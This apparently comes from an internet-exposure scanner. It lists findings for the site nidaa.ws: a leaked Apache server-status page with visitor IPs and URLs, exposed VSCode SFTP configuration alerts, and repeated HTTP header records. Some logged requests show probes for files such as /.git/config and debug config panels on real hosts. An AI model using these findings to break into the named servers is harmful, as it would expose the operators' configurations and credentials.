      54.36.149.28http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=3&q=542&t=54.36.148.64&c=5 HTTP/
      
      0-3271580/175/5348_
      20.511920108331630.06.44825.90
      185.191.171.10http/1.1albayan.edu.sa:80GET /e_sch/news_replies.php?i_f=1281&l_n=1&page=1&user=web HTTP
      
      1-2-0/0/4331.
      0.0017887043423670.00.00607.71
      54.188.147.190http/1.13dvi.com:80GET / HTTP/1.1
      
      1-2-0/0/4387.
      0.001788791164646570.00.00690.80
      54.36.148.87http/1.1daris.live:443GET /category/User%20Experience HTTP/1.1
      
      1-2-0/0/4093.
      0.0017887142455580.00.00629.11
      77.31.246.66http/1.1wahjcm.com:443GET /favicon.ico HTTP/1.1
      
      1-2-0/0/3873.
      0.0017887064090760.00.00534.75
      54.36.148.153http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=852&t=54.36.148.223&c=5 HTTP/
      
      1-2-0/0/4389.
      0.0017887241345410.00.00814.36
      172.68.26.5http/1.1support.daaris.com:443GET /templates/new/assets/css/main.css HTTP/1.1
      
      1-2-0/0/4630.
      0.001788735138858960.00.00584.77
      66.249.70.65http/1.1sulaimaniya.edu.sa:443GET /%D9%85%D8%AA%D8%B7%D9%84%D8%A8%D8%A7%D8%AA-%D8%A7%D9%84%D8
      
      1-2-0/0/4258.
      0.001788722546715220.00.00611.59
      185.191.171.4http/1.1jawad.com.sa:443GET /variable-product-page.php?a=3&i_p=110 HTTP/1.1
      
      1-2-0/0/
      Found on 2024-03-28 06:00
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7594de124

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.58 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Mar 19 2024 23:10:28
      
      Current Time: Thursday, 28-Mar-2024 09:00:39 +03
      Restart Time: Thursday, 21-Mar-2024 04:04:48 +03
      Parent Server Config. Generation: 4
      Parent Server MPM Generation: 3
      Server uptime:  7 days 4 hours 55 minutes 51 seconds
      Server load: 0.01 0.04 0.05
      Total accesses: 1001468 - Total Traffic: 143.1 GB - Total Duration: 2258110883
      CPU Usage: u463.74 s52.64 cu3606.86 cs979.66 - .82% CPU load
      1.61 requests/sec - 241.0 kB/second - 149.8 kB/request - 2254.8 ms/request
      46 requests currently being processed, 0 workers gracefully restarting, 79 idle workers
      KK_K___K____KK___W__K____.......................................
      ................................................................
      ......................__K__KK___K_KK_KK_K_____K_K__RKKKK_K______
      ____KK__K____K_KKK__K___R__KK__KWK___K________KKKK___KK___......
      ................................................................
      ................................................................
      ................................................................
      ..WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW............
      ................................................................
      ................................................................
      ............................................................WWWW
      WWWWWWWWWWWWWWWWWWWWW...........................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      <SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-3271581/174/5521K
      20.600071809210.835.83627.94
      162.158.87.109http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-3271582/185/5574K
      20.6601666034267.541.211137.60
      172.70.246.173http/1.1nidaa.ws:80GET /login.action HTTP/1.1
      
      0-3271580/191/5688_
      20.482143869150060.073.25951.71
      195.191.219.132http/1.1alezdhar.com:443GET / HTTP/1.1
      
      0-3271581/166/5673K
      20.600177061460.819.96648.18
      172.69.150.121http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-3271580/130/5369_
      20.5338064816330.028.62863.62
      54.36.149.27http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=945&t=54.36.149.99&c=5 HTTP/1
      
      0-3271580/140/5527_
      20.52175356801180.09.58759.86
      66.249.64.8http/1.1hawsab.me:80GET /?ben1048wxlcirb514.html HTTP/1.1
      
      0-3271580/146/5809_
      20.46288063470730.042.49711.36
      85.208.96.195http/1.1albayan.edu.sa:80GET /e_sch/news_replies.php?i_f=1596&l_n=1&page=1&user=web HTTP
      
      0-3271581/111/5329K
      20.5904910666785219.95.14583.30
      162.158.94.135http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      0-3271580/177/5712_
      20.46265066913910.09.47921.61
      145.220.91.19http/1.1albayan.edu.sa:80GET / HTTP/1.1
      
      0-3271580/154/5827_
      20.48230196661440.021.75766.25
      40.77.167.19http/1.1albayan.edu.sa:443GET /imgweb/cur41/9th/9th%20Grammar%20WB%20T1%2019.pdf HTTP/1.1
      
      0-3271580/124/5560_
      20.5313077135200.011.43880.09
      54.36.148.102http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=919&t=54.36.150.120&c=5 HTTP/
      
      0-3271581/176/5404K
      20.650156173840.818.24733.45
      172.71.99.134http/1.1nidaa.ws:80GET /.git/config HTTP/1.1
      
      0-3271581/168/5560K
      20.550181266930.88.92676.67
      172.71.98.156http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      0-3271581/141/5335K
      20.5402678037566.78.13800.92
      172.71.98.213http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-3271580/198/5744_
      20.4631712067305400.07.26916.40
      172.70.38.55http/1.1support.daaris.com:443GET /submitticket.php?deptid=6&language=czech&step=2 HTTP/1.1
      
      0-3271580/170/5453_
      20.492084875839010.09.681033.79
      185.191.171.10http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?i_f=868&page=1&user=web HTTP/1.1
      
      0-3271580/98/5637_
      20.540281549900.05.56747.37
      172.71.131.66http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-3271581/96/5523K
      20.650606801690219.815.95821.58
      172.71.183.69http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      0-3271580/135/5645_
      20.5119528055709090.039.72842.52
      40.77.167.2http/1.1albayan.edu.sa:443GET /imgweb/ektebar2222141510.png HTTP/1.1
      
      0-3271580/138/5416_
      20.49203188118120.011.53930.21
      31.167.169.234http/1.1albayan.edu.sa:443GET /e_sch/images/footer.jpg HTTP/1.1
      
      0-3271581/158/5256K
      20.5433830041467.047.96929.71
      172.71.154.99http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-3271580/168/5099_
      20.550262446420.070.39909.67
      162.158.94.240http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-3271580/134/5447_
      20.5374668398630.08.341107.91
      46.52.15.176http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      0-3271580/116/5147_
      20.52138076535260.016.211078.37
      54.36.149.28http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=3&q=542&t=54.36.148.64&c=5 HTTP/
      
      0-3271580/175/5348_
      20.511920108331630.06.44825.90
      185.191.171.10http/1.1albayan.edu.sa:80GET /e_sch/news_replies.php?i_f=1281&l_n=1&page=1&user=web HTTP
      
      1-2-0/0/4331.
      0.0017887043423670.00.00607.71
      54.188.147.190http/1.13dvi.com:80GET / HTTP/1.1
      
      1-2-0/0/4387.
      0.001788791164646570.00.00690.80
      54.36.148.87http/1.1daris.live:443GET /category/User%20Experience HTTP/1.1
      
      1-2-0/0/4093.
      0.0017887142455580.00.00629.11
      77.31.246.66http/1.1wahjcm.com:443GET /favicon.ico HTTP/1.1
      
      1-2-0/0/3873.
      0.0017887064090760.00.00534.75
      54.36.148.153http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=852&t=54.36.148.223&c=5 HTTP/
      
      1-2-0/0/4389.
      0.0017887241345410.00.00814.36
      172.68.26.5http/1.1support.daaris.com:443GET /templates/new/assets/css/main.css HTTP/1.1
      
      1-2-0/0/4630.
      0.001788735138858960.00.00584.77
      66.249.70.65http/1.1sulaimaniya.edu.sa:443GET /%D9%85%D8%AA%D8%B7%D9%84%D8%A8%D8%A7%D8%AA-%D8%A7%D9%84%D8
      
      1-2-0/0/4258.
      0.001788722546715220.00.00611.59
      185.191.171.4http/1.1jawad.com.sa:443GET /variable-product-page.php?a=3&i_p=110 HTTP/1.1
      
      1-2-0/0/4004.
      
      Found on 2024-03-28 06:00
  • VSCode SFTP configuration exposed
    First seen 2024-03-28 06:00
    Last seen 2024-06-21 02:20
    Open for 84 days
  • VSCode SFTP configuration exposed
    First seen 2024-05-15 21:57
    Last seen 2024-06-20 01:51
    Open for 35 days
  • VSCode SFTP configuration exposed
    First seen 2024-05-15 21:57
    Last seen 2024-06-21 05:17
    Open for 36 days
  • VSCode SFTP configuration exposed
    First seen 2024-03-28 06:00
    Last seen 2024-06-20 23:38
    Open for 84 days
  • Open service 188.114.97.3:80 · www.nidaa.ws

    2024-06-21 05:17

    HTTP/1.1 200 OK
    Date: Fri, 21 Jun 2024 05:17:39 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4nXNSMCW6MNyQkEA0FBYKHzxlOzTdpRuYR39epKHukV%2BsRtuWxa35366WuhXYS2KbhgFbKdxZCZuNWxPvJ7quhBCole03WIAMAL0IPuCRh0GoP4Zz1UvvyIYzivqdw8%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8971888fa9dac436-EWR
    alt-svc: h3=":443"; ma=86400
    
    Found 18 minutes ago by HttpPlugin
    Create report
  • Open service 188.114.97.3:80 · www.nidaa.ws

    2024-06-21 03:50

    HTTP/1.1 200 OK
    Date: Fri, 21 Jun 2024 03:50:42 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZQDVpsPxfP549bAyfPWW2WeZ9s6HJy29veKmk6w9ZbL7BBc4FhnX0zoqvODG9IogHA6CcfAi5lBAeey9prMWBe%2B4AWXDbt1fHYogNoIE1m6MN9WzEel93uhOThssM6Y%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 897109362c656358-LHR
    alt-svc: h3=":443"; ma=86400
    
    Found 2 hours ago by HttpPlugin
    Create report
  • Open service 188.114.96.9:443 · nidaa.ws

    2024-06-21 02:20

    HTTP/1.1 200 OK
    Date: Fri, 21 Jun 2024 02:20:30 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MHljTaTFWfmF1mLfB1NBJ2e1ASwzxqHR7pKsPq9PcOYZGshX%2FvXjsKeYOJ9c08%2BXbj%2FmtnEEOX7o5SN%2BhDHJ03v395kYmnAp%2F78MnRjPAe15QK%2B9jJ2I1%2FRNew%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 897085109f30912a-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 3 hours ago by HttpPlugin
    Create report
  • Open service 188.114.96.9:443 · nidaa.ws

    2024-06-21 00:44

    HTTP/1.1 200 OK
    Date: Fri, 21 Jun 2024 00:44:28 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BeUvkB1KgX1%2FpHLS0pOPdk%2BH6IIiQ2lDJZVDkqkGaPSN4hMyH5i9LE8jMRAU0ryU4oD0%2BD0TdEpHqXiPdKIpTPSdr1y%2FWhpfXYKT4UmWKFCYRU4%2BDT6Vtx3AtA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 896ff864ab4eac03-YYZ
    alt-svc: h3=":443"; ma=86400
    
    Found 5 hours ago by HttpPlugin
    Create report
  • Open service 188.114.97.9:80 · nidaa.ws

    2024-06-20 23:38

    HTTP/1.1 200 OK
    Date: Thu, 20 Jun 2024 23:38:32 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wimKDbiSjmdxOwmQwRwTALwXxsla40JX4Po87sPWwUArPA5je6JET%2FxI%2B67Djq%2B6f%2BpKUre4%2Foq4VUWB3XVhSfJyWxL3fp0LDQe5zBJKTdGJHVcy6PqBuXr4fw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 896f97ce28721c44-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 6 hours ago by HttpPlugin
    Create report
  • Open service 188.114.97.9:80 · nidaa.ws

    2024-06-20 05:47

    HTTP/1.1 200 OK
    Date: Thu, 20 Jun 2024 05:47:13 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SWHdOyUGPYxWWzV0nfJqjQtH5Bjerh%2B4kyLbjJk3pKxOktha2C5zFSoKI%2FZlGKGOa7tVzx3SBu9JdbK10e0Wru6%2BzITUZesx9IKjevfqh7eVSmJgmrdTS5d%2F5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 896976837e988ebb-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found one day ago by HttpPlugin
    Create report
  • Open service 188.114.97.3:443 · www.nidaa.ws

    2024-06-20 01:51

    HTTP/1.1 200 OK
    Date: Thu, 20 Jun 2024 01:52:00 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IzNwbjIvWHOD701j1VDeRrEfTXADDo%2FigDBmqLu5BPRB0upwYLPJEtjuMMyjOeKtQ6oQyYLZqIYgsMMDjBWsO7YZqb75glDi9%2BUMD72Ciy4vtydXXu2JtQsJeUxXbmc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 89681df23d4623e2-LHR
    alt-svc: h3=":443"; ma=86400
    
    Found one day ago by HttpPlugin
    Create report
  • Open service 188.114.97.3:443 · www.nidaa.ws

    2024-06-20 01:51

    HTTP/1.1 200 OK
    Date: Thu, 20 Jun 2024 01:51:59 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U4fGwAyJkXwXbglfQoV5WDw2fG850RRiUAjgwfIcalchPqbqw%2B7Xk4hjBURCZsBeU5dQadGfFKHDqFAQxg1I%2F7XCknv4kraaNxeFQ3BaymxDxzyDclXgRyOmXRZ%2FYRk%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 89681def1b1e916a-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found one day ago by HttpPlugin
    Create report
  • Open service 188.114.97.3:80 · www.nidaa.ws

    2024-06-18 20:41

    HTTP/1.1 200 OK
    Date: Tue, 18 Jun 2024 20:41:38 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BRy1lvQi76uCdIFmSIRVDM2pgZAqog6cFXDys0rQN8hjGQABHC95lGdwwaFm9kFeHUu5xflXPJjm8ENsgv7JVWTw%2FwMQzChIV6O%2BlRD6R495sBEIt2KdlpRoLlPqkhs%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 895e19f12a218924-LHR
    alt-svc: h3=":443"; ma=86400
    
    Found 2 days ago by HttpPlugin
    Create report
  • Open service 188.114.97.3:80 · www.nidaa.ws

    2024-06-18 19:32

    HTTP/1.1 200 OK
    Date: Tue, 18 Jun 2024 19:32:28 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OyZePUHLhHq5oPShJdoyY8JwmXyHd%2BXaj%2Fnhpeni%2Bhr9qr7NTzRB0htz63AVio4QPxev0RIpMrDbWEiVqcUUZqv9tptlmRlkLzB7Tr%2F%2FtZW8awG2t92%2BiKci1EwdmXo%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 895db4a00aa29c04-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2 days ago by HttpPlugin
    Create report
  • Open service 188.114.97.9:80 · nidaa.ws

    2024-06-18 18:56

    HTTP/1.1 200 OK
    Date: Tue, 18 Jun 2024 18:56:53 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2icS3I8IiU53v1UYMPukkD%2FtlrvEK%2FJLxK5Ny07ntYj2cOPMq3stB%2BffguhQoVhbQy73y6CVAdSNyZqI33CYF7xRJ7pF4ui5VQK9rcJeZ4F%2FTVruaiRHtSimvw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 895d807ccaf0bb77-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2 days ago by HttpPlugin
    Create report
  • Open service 188.114.96.9:443 · nidaa.ws

    2024-06-18 16:19

    HTTP/1.1 200 OK
    Date: Tue, 18 Jun 2024 16:19:22 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jRjQh7Ma3NtE3SO%2Bn1%2FC0nwqODRFCcp5exg8VVxk0Dp7lVvWPFaQSyUbt62oVzFT4y78TWp5fIlsGFt8s8LI2HL3mldSTXdnxmfvzVefn%2Fb77CTdlmc%2BkiVxnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 895c99c19ce2381a-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 3 days ago by HttpPlugin
    Create report
  • Open service 188.114.97.3:443 · www.nidaa.ws

    2024-06-18 15:34

    HTTP/1.1 200 OK
    Date: Tue, 18 Jun 2024 15:34:20 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=acIPwDvhvf%2Fo7lWGOui8kWUKXKqpQCWMCylTUQY8vcP3xKykXqLv3Vuh56c%2BBDe%2FklnIkvvi7t3mhBHbZTzG5dq5xvLGGBK3osLztkwlvUNiLknB1wDTJXbsM8YNeL4%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 895c57cbfa5b975e-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 3 days ago by HttpPlugin
    Create report
  • Open service 188.114.97.3:443 · www.nidaa.ws

    2024-06-18 15:34

    HTTP/1.1 200 OK
    Date: Tue, 18 Jun 2024 15:34:20 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nZtJdpatjKrkI3iKNNMyCahuD4OvWUBpMUtkNgwq%2FQSnxHe0UGTZN90G%2BHxWt4BBn8%2FXFn2KhOiJGzMtYBKmTe%2F9Jhc2gy194YHOql2WyBROR5h1Ae36Q7p26vvqAlE%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 895c57cbe83365ff-AMS
    alt-svc: h3=":443"; ma=86400
    
    Found 3 days ago by HttpPlugin
    Create report
  • Open service 188.114.96.9:443 · nidaa.ws

    2024-06-18 07:34

    HTTP/1.1 200 OK
    Date: Tue, 18 Jun 2024 07:34:22 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=49kRRC85kIj7s7WFue%2Bspf6Uz%2B9HFaoNO0XecjDPp%2BHp0KNij7JZOrkZb6EQNR%2BO3pHw%2B2hyV7%2FBGX%2F2rvbDifEV5EVKnJKmIRSgrQnbje9e2aD8koluvkQi0A%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 895998b8a987b95a-AMS
    alt-svc: h3=":443"; ma=86400
    
    Found 3 days ago by HttpPlugin
    Create report
  • Open service 188.114.97.9:80 · nidaa.ws

    2024-06-18 01:59

    HTTP/1.1 200 OK
    Date: Tue, 18 Jun 2024 01:59:21 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sSYDkcxYLxLRMjxMyXdVxziGaxKX0bHltKBjhX%2FstPoP6j15jkg9QJ3Ya9174Bruzj%2BtSM0RLlvBgt9mjJjTuY9BuoYLE9QBxYVMceiMSiEmVufKB4jgXy%2FrLA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8957adf82d68c46b-EWR
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-18 by HttpPlugin
    Create report
  • Open service 188.114.97.3:80 · www.nidaa.ws

    2024-06-16 22:51

    HTTP/1.1 200 OK
    Date: Sun, 16 Jun 2024 22:51:56 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pkLUa6vCWGFmZmLWRRFt%2B3r794sEi7OD1Kv5PkznITlz%2FOccoWsdaLvM7OmRlmCjrxpZ0p%2FOmH6KhiPoBpzfTWOYju%2Flj9vciLH999u2W%2BdFETXMN8hATUcP1dPIp84%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 894e5e0b88f59b8f-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-16 by HttpPlugin
    Create report
  • Open service 188.114.97.9:80 · nidaa.ws

    2024-06-16 21:16

    HTTP/1.1 200 OK
    Date: Sun, 16 Jun 2024 21:16:55 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lC1Vx%2FdwADOMkKzDU0xYW0EhMGgVaU%2F%2Fs7bXGM5DwsXPAcCAbgp5nkuVMkfx2IcH6cMv6H1TnDUywz3TaB1i66dgCMBDYvT2oT3ygl9xSIy0EUOv1050rbLEPw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 894dd2da2c0215c2-SJC
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-16 by HttpPlugin
    Create report
  • Open service 188.114.97.3:443 · www.nidaa.ws

    2024-06-16 18:16

    HTTP/1.1 200 OK
    Date: Sun, 16 Jun 2024 18:16:04 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3yECJhPSG7PuygHUdUZmQkudTRyD54%2Bo8aQbM%2BMmGo8m5JQC71vec9kjNcZ%2Bf92wrjf6SLh4eSeeVrSR31KTbohIjaaOWAq3xU4uEjLX4jUjFlbDeBPwrdYiIxRtRwQ%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 894cc9f5c8364263-EWR
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-16 by HttpPlugin
    Create report
  • Open service 188.114.96.9:443 · nidaa.ws

    2024-06-16 11:48

    HTTP/1.1 200 OK
    Date: Sun, 16 Jun 2024 11:48:12 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JwX6f6C38b%2BXK5VXgX5DzGRHZPf0mzFN40dmcouKNFXiSD%2BESZOXPZISV1q8k7BDEWOFqw4qDR0p2eJXAqFkRFUKsIWkD8RuBwNDp9jM4Upxh%2B2KIfKgEkix0w%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 894a91cb6a4c1c15-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 2024-06-16 by HttpPlugin
    Create report
  • Open service 188.114.96.9:443 · nidaa.ws

    2024-06-16 10:45

    HTTP/1.1 200 OK
    Date: Sun, 16 Jun 2024 10:45:55 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Tue, 23 Aug 2022 20:30:06 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
